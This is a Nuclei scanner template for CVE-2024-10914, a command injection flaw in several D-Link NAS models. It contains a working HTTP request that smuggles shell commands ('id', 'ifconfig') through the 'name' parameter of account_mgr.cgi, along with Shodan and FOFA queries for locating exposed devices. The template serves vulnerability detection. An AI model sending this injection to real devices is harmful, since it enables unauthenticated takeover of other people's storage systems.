id: CVE-2024-10914

info:
  name: D-Link NAS - Command Injection via Name Parameter
  author: s4e-io
  severity: critical
  description: |
    A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been declared as critical. Affected by this vulnerability is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument name leads to os command injection.
  impact: |
    Unauthenticated attackers can execute arbitrary OS commands via the name parameter, potentially compromising the entire D-Link NAS device.
  remediation: |
    Update D-Link DNS-320, DNS-320LW, DNS-325, and DNS-340L firmware to versions released after 20241028.
  reference:
    - https://github.com/verylazytech/CVE-2024-10914
    - https://www.usom.gov.tr/bildirim/tr-24-1836
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10914
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-10914
    cwe-id: CWE-707
    epss-score: 0.93611
    epss-percentile: 0.99845
    cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:*
  metadata:
    vendor: dlink
    product: dns-320_firmware
    shodan-query: http.html:"sharecenter"
    fofa-query: body="sharecenter"
  tags: cve,cve2024,dlink,sharecenter,rce,vkev,vuln

http:
  - raw:
      - |
        GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;{{command}};%27 HTTP/1.1
        Host: {{Hostname}}

    payloads:
      command:
        - "id"
        - "ifconfig"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)"
          - "contains_all(body, 'inet addr:', 'Mask:')"
        condition: or

      - type: dsl
        dsl:
          - 'contains(body, "Content-type: text/html")'
          - "status_code == 200"
        condition: and
# digest: 4b0a0048304602210097f1ad564b50180f7add33a4dac5ac78fd362e2aef339f005a3f6aa362850a2a022100b6020b509e4726d524fb1674c4ae962181cee9027fcf057b3f86221ae188499f:922c64590222798bb761d5b6d8e72950